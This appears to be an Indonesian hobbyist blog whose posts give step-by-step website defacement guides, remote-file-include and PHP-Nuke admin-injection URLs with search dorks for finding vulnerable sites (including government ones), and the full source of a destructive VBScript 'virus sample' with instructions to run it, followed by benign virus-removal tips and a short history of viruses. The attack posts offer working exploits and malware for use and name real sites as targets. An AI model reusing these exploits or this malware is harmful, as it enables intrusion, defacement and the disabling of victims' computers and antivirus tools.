2. Beri nama halaman web tersebut dengan index.html / index.asp / default.html /
default.asp atau nama lain tergantung nama file halaman pertama suatu web
terbuka atau nama terserah anda apabila hanya mau menyimpan file tersebut di
suatu web

3. Buka My computer pada desktop dan lihat icon web folder

4. Klik 2 kali pada icon web folder tersebut

5. klik 2 kali pada icon add web folder

6. Isikan URL target di popup yang muncul misalkan target kita adalah
http://www.pertamina.co.id maka isikan URL tersebut

7. klik next lalu finish

8. Klik 2 kali pada folder yang terbentuk dan anda akan melihat isi folder tersebut
dengan file file yang akan tampil pada halaman web apabila kita mengunjungi
web tersebut

9. rubah nama file pembuka web tersebut (biasanya nama file index.html atau
index.asp) dengan nama file lain seperti index_old.asp atau terserah anda ,
biasakan hal ini anda lakukan karena kita tidak bermaksud untuk merusak isi web
milik orang lain , hanya mengingatkan.

10. Copy dan paste-kan halaman web yang anda buat tadi di folder web folder yang
telah kita buat

11. Save di komputer anda.

12. Proses Deface selesai.

Untuk pembelajaran silahkan anda cari web site yang masih vurn dengan menggunakan
google searching ketikan keyword dengan kunci “allinurl:*.asp” atau apabila mau
mencari situs pemerintah ketikan keyword “web: .go.id”
Untuk para administrator web site , download-lah patch bug tersebut untuk menghindari
terjadinya deface yang sangat mudah ini dengan demikian untuk para defacer yang
hendak coba coba deface dengan cara ini dan prosesnya gagal , sudah dipastikan web siteyang hendak anda deface sudah tidak vurn lagi atau sudah di-patch.
Selamat mencoba.

Cara Mudah Deface Remote File Include

Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..

cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url

[EvilShellInject] = inject rshell / c99 kamu

Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com

- Site Oneadmin RFI

Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]

- PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…

nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

- Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]

Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..

Nah setelah itu buadlah sebuad file: index.html

Isi dengan:

Hacked by Nama Kamu

Kemudian upload deh file ke directorynya

kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html

deface website sederhana

2010-02-02T15:22:00.000+07:00

cara deface paling sederhana langkah langkahnya sebagai berikut
Buka situs google

kemudian ketik keyword nya ==> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php

Nah ..... kalo sudah ketemu targetnya maka langkah selanjutnya adalah :

1. www.target.com/nuke/index.php

2. www.target.com/nuke/index.php ==> index.php tadi dirubah menjadi admin.php

3. Tambahkan bug ini dibelakang situs tadi :

?op=AddAuthor&add_aid=nino&add_name=nno&add_pwd=ninoalone&add_email=nino@linuxmail.org&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

jadi ketik di url kamu seperti contoh dibawah ini :

www.target.com/nuke/admin.php?op=AddAuthor&add_aid=nino&add_name=nno&add_pwd=ninoalone&add_email=nino@linuxmail.org&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

4. Kalo berhasil, maka di url/browsing kamu akan muncul : www.target.com/nuke/admin.php?op=mod_author

Kalo gak, berarti situs tsb udah di path ama admin nya.

5. Kalo berhasil, disana kamu di suruh login, masukin id & password kamu tadi. Masih ingat kan ???

id=nino ==> liat point 3 diatas
password=ninoalone ==> liat point 3 diatas

Nah . . . kamu sekarang sudah masuk ke "Administration Menu" situs tsb. Berarti kamu sudah mengusai situs tsb sekarang ! Hehehe...

Sekarang kamu pilih gambar Handphone (dibawahnya ada tulisan Messages), lalu ketik :

title ==>Defaced by NinO
content ==>Hey admin.......find your hole and close it..Greetz to everyone at CuPu²
expiration ==> pilih unlimited trus klik tab add messages yang ada di bawah

Kalo sudah, buka url/browsing baru lalu ketikkan situs target tadi, misal : www.target.com/nuke atau www.target.com/nuke/index.php

kalo nggak ada hasil deface kamu coba klik tab refresh yang ada diatas yg disamping url/browsing kamu.

sampel virus

2010-01-29T13:58:00.002+07:00

haloo semua ketemu lagi nih....
ini ada sampel virus... aku dapat dari forum Smadav
silahkan yang mau uji coba yah...
copy dari sini
--------------------------------------------------------------------------------------
'FLyff 666.dll.vbs

set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\User",winpath&"\Flyff 666.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Flyff 666"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\CleanShutdown", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\FaultTime", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Shutdown_Settings", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\System", "1", "REG_DWORD"
rg.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoScrSavPage", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoClose", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoRun", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Monitoring", "1", "REG_DWORD"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Flyff 666 VM_Community"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Saya Adalah Program Jahat yang Mengambil Alih Komputer kalian !! dibuat Oleh Flyff 666"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger",""
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption", "H4x0r3d By Flyff 666"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText", "Saya Adalah Program Jahat yang Akan Mengambil Alih Komputer kalian !! System Hasbeen Hacked BY : Flyff 666 From Indonesian Hackers Community"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"
------------------------------------------------------------------------------------------------
setelah dicopy dan paste pada notepad kamu
beri nama virus itu terserah kamu terus belakangnya kasih ekstensi .vbs contoh = gilabener.vbs
cara uji cobanya tinggal klik 2x ok selamat mencoba....
uups lupa ini anti dot nya:
----------------------------------------------------------------------------------------------
[Version]
Signature=”$Chicago$”
Provider=Fariskhi
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKCU, Software\Microsoft\Windows\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\CleanShutdown", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\FaultTime", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Shutdown_Settings", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\System", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\NoScrSavPage", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoClose", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"
HKCU, Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoRun", "1",
HKCU, Software\Policies\Microsoft\Windows\System\DisableCMD", "1", "REG_DWORD"
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Monitoring", "1", "REG_DWORD"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Flyff 666 VM_Community"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Saya Adalah Program Jahat yang Mengambil Alih Komputer kalian !! dibuat Oleh Flyff 666"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger",
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption", "H4x0r3d By Flyff 666"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText", "Saya Adalah Program Jahat yang Akan Mengambil Alih Komputer kalian !! System Hasbeen Hacked BY : Flyff 666 From Indonesian Hackers Community"
HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"
HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"
HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"
---------------------------------------------------------------------------------------------

Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : JATIxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.

menangkal virus masuk tanpa antivirus

2009-06-01T11:04:00.003+07:00

nah ini ketemu lagi...
kamu belum punya antivirus dikomputer?....
atau antivirus kamu udah kadaluarsa alias out off date?
jangan khawatir sekarang kamu ga perlu takut ma ntu viruz viruz nakal...
ini tipsnya :
1. baca basmalah dulu...
2. hidupkan kompi kamu... terus langkah pertamanya yaitu kita buka semua file yang ter hidden ..>> caranya : klik explorer(klik kanan pada start)>> Tools, >> Folder options, >>> view >> show hidden file and folders dan hilangkan cheklist pada hide extension for known file type, dan hilangkan cheklist juga pada hide protected operating system file>>> kalo ada pertanyaan jawab yes atau enter ajah, terus klik apply, >>> ok
3. non aktivkan auto play caranya : klik start,>>> run >> ketik gpedit.msc, >>> ok >>> nanti muncul group policy >> lihat pada komputer konfiguration >> klik administrativ template >>> klik 2x pada system kemudian cari turn off auto play, >>> klik enable, >>> klik alldrive pada turn off auto play on, terus lakukan hal yang sama pada user configuration itu lho dibawah komputer configuration. <<<< fungsi dari hal ini adalah untuk mencegah virus masuk menggunakan program autorun.inf jadi flashdisk apapun yang terserang/ terinfeksi viruz tidak akan menular di komputer kita secara otomatis..
4. dari no 3 sebenarnya komputer kita relatif aman tapi kalo ada trojan yang menyamar dengan icon word, exel atau jpg kita bisa ketipu dan malah mengaktifkan viruz di kompi kita. untuk itu kita harus tau mana file virus mana file yang bukan, caranya yaitu : tiap masukin flash disk klik explorer pada start terus klik view >>detail, perhatikan pada name..size..dan type, >> jika pada type muncul tulisan aplication padahal namenya icon word, excel, maupun jpg dan berextension.exe berarti itu file viruz dan liat sizenya pasti sama, langsung aja kita hapus caranya klik 1x (jgn 2x)tekan Shift+delete periksa semua yah jangan sampai ada file viruz yang tercecer, terus jangan lupa file dengan nama autorun.inf juga dihapus, setelah itu perhatikan juga file yang kira kira belum pernah kita masukin tapi muncul disitu langsung aja disikat. eh file dengan nama recycler sikat sekalian karena itu bisa jadi viruz juga
terus file asli kita yang dihidden atau berbayang kita kembalikan lagi seperti semula caranya liat pada posting sebelum ini dengan judul mengembalikan file yang dihidden viruz, <<<< oke sekarang kompi kita aman tak ada seekor viruzpun bisa masuk ke kompi lewat flashdisk maupun media penyimpanan lainya. dan kamu tambah jago jadi dukun komputer... he he he...
siapa dulu gurunya
oke selamat mencoba...
sorry lowbat nih... sampai ketemu lain waktu
perangi viruz sampai mati...

mengembalikan data yang dihidden virus

2009-05-23T20:58:00.002+07:00

ketemu lagi di postingan >> cozz dah lama blog ini ga di update
ok... langsung aja deh....
gini>>> kamu pernah punya data dikomputer, terus tiba tiba lenyap dan berganti menjadi extension exe. wah udah pasti tuh kompi kamu kena viruz
terus kamu instal antivirus yang baru...>>>> eh pas discan malah data ilang semua
pasti kamu panik setengah hidup , mana data penting lagi>>>
sekarang kamu jangan bingung dan panik, sebenarnya data kamu cuma dihidden oleh si viruz
yang dia tampilkan cuma icon word/exel/jpg dengan nama file kamu dan dibelakangnya extensionya diganti .exe, itulah sebenarnya file siviruz yang menyamar jadi file dengan nama yang sama, makanya kalo kedetek antiviruz langsung didelete/remove to vault. alhasil file asli kamu ga kelihatan karena di hidden, cara mengembalikanya sangat mudah....
mau tau?>>>>>>>
ok deh gw kasih tutorialnya
langkah langkahnya
1. siapkan snack + minuman
2. baca basmalah
3. siapkan kompi kamu buka notepad>>> dah tau notepad kan itu lho klik di start>>all program>>acessoris>>notepad
terus ketik di notepad:
attrib -r -a -s -h /s /d
exit

terus kamu simpan dengan nama unhidden.bat
nah kalo udah taruh tuh file unhidden.bat ditempat dimana kamu menyimpan file file yang hilang >> misal di D: atau di flashdisk, trus klik 2 kali, tunggu beberapa saat, kalo filenya banyak biasanya jadi agak lama.
nah sekarang file kamu dah kembali
4. sekarang baca hamdalah

nah kamu udah jadi dukun komputer yang bisa menyulap yang hilang jadi ada
ok... deh lain waktu gw akan ngebahas trik menjauhkan kompi kita dari si viruzz nakal tanpa antivirus sekalipun
ok... see you next time
be better now
perangi virus dari sekarang

MENGENAL VIRUS KOMPUTER

2008-12-28T16:55:00.000+07:00

Mengenal Virus Komputer

Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan jaringan ( internet ) sudah sangat sering mendengar istilah “virus” yang terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai virus, yang nantinya diharapkan dapat membuat kita semua mengerti dan memahami tentang virus.

ASAL MUASAL VIRUS
1949, John von Neumann, menggungkapkan " teori self altering automata " yang merupakan hasil riset dari para ahli matematika.
1960, Lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori yang diungkapkan oleh John von Neumann, dengan membuat suatu jenis permainan/game. Mereka membuat program yang dapat memperbanyak dirinya dan dapat menghancurkan program buatan lawan. Program yang mampu bertahan dan menghancurkan semua program lain, akan dianggap sebagai pemenangnya. Permainan ini akhirnya menjadi permainan favorit di tiap-tiap lab komputer. Tetapi, semakin lama program yang diciptakan makin berbahaya, sehingga mereka melakukan pengawasan dan pengamanan yang ketat terhadap permainan ini.
1980, Program-program tersebut yang akhirnya dikenal dengan sebutan "virus" ini berhasil menyebar keluar lingkungan laboratorium, dan mulai beredar di masyarakat umum.

PENGERTIAN VIRUS
"A program that can infect other programs by modifying them to include a slighty altered copy of itself. A virus can spread throughout a computer system or network using the authorization of every user using it to infect their programs. Every programs that gets infected can also act as a virus that infection grows“
( Fred Cohen )

Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di Amerika Serikat. Virus komputer dinamakan “virus” karena memiliki beberapa persamaan mendasar dengan virus pada istilah kedokteran (biological viruses).
